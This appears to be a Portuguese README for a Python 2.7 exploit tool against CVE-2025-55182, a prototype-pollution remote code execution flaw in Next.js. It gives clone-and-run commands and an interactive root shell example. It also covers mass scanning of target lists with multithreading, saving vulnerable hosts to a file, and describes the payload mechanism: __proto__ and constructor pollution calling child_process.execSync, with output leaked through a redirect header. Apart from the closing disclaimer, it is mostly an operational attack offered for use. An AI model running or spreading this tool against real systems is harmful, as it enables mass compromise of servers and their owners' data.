
Ferramenta de Exploit CVE-2025-55182 – exploit em Python 2.7 para poluição de prototype no Next.js que leva a RCE
Um exploit em Python 2.7 para CVE-2025-55182 – uma vulnerabilidade crítica de poluição de protótipo / RCE em aplicações Next.js.
Esta ferramenta permite tanto shell interativo para um único alvo quanto varredura em massa de múltiplos hosts com multithreading, saída colorida e fallback automático para HTTPS.
https:// se nenhum protocolo for fornecidoid padrão para qualquer comando (whoami, ls, etc.)requests (facilmente instalável)requests – instale com:
pip install requests
git clone https://github.com/Jenderal92/cve-2025-55182.git
cd CVE-2025-55182
pip install requests
Torne o script executável (opcional):
chmod +x CVE-2025-55182.py
python2 CVE-2025-55182.py https://target.com
ou sem protocolo (HTTPS é adicionado automaticamente):
python2 CVE-2025-55182.py target.com
Uma vez conectado e verificado como vulnerável, você recebe um prompt de shell:
$ id
uid=0(root) gid=0(root) groups=0(root)
$ whoami
root
$ ls -la
...
Comandos internos:
exit / quit – fecha o shellclear – limpa a telahelp – mostra ajudaPrepare um arquivo com um alvo por linha (com ou sem http/https):
targets.txt
app-site3.htface.tech
https://example.com
http://127.0.0.1:3000
vulnerable-site.org
Execute a varredura em massa (padrão: 10 threads, comando id, saída res.txt):
python2 CVE-2025-55182.py targets.txt
Personalize threads, comando, arquivo de saída:
python2 CVE-2025-55182.py targets.txt 20 "whoami" results.txt
20 – número de threadswhoami – comando a ser executado em cada alvo vulnerávelresults.txt – arquivo de saída (apenas entradas vulneráveis são salvas)Exemplo de saída da varredura em massa:
[INFO] Carregadas 4 URLs
[INFO] Threads: 10, Comando: 'id', Saída: res.txt
[*] (1/4) Verificando: https://site.com
[+] VULNERÁVEL: https://site.com
Status: 303
Saída: uid=0(root) gid=0(root) groups=0(root)
[-] NÃO VULNERÁVEL: https://example.com
...
Resultados salvos (res.txt):
domain : https://site.com
cmd : uid=0(root) gid=0(root) groups=0(root)
--------------------------------------------------
O exploit envia uma requisição multipart/form-data manipulada para um endpoint Next.js (/login é anexado se o caminho estiver vazio).
Ele abusa da poluição de protótipo (__proto__:then e constructor:constructor) para injetar um prefixo malicioso que executa um comando do sistema usando child_process.execSync().
O servidor responde com um redirecionamento 303 contendo a saída do comando no cabeçalho x-action-redirect (ou Location). A ferramenta extrai o resultado de /login?a=<output>.
Esta ferramenta é destinada apenas para fins educacionais e testes de segurança autorizados. O acesso não autorizado a sistemas de computador é ilegal. O autor não assume nenhuma responsabilidade por qualquer uso indevido ou danos causados por este software. Você deve ter permissão explícita por escrito do proprietário do sistema alvo antes de usar este exploit.
Mais avisos podem ser encontrados na capa do Jenderal92. Você pode conferir AQUI !!!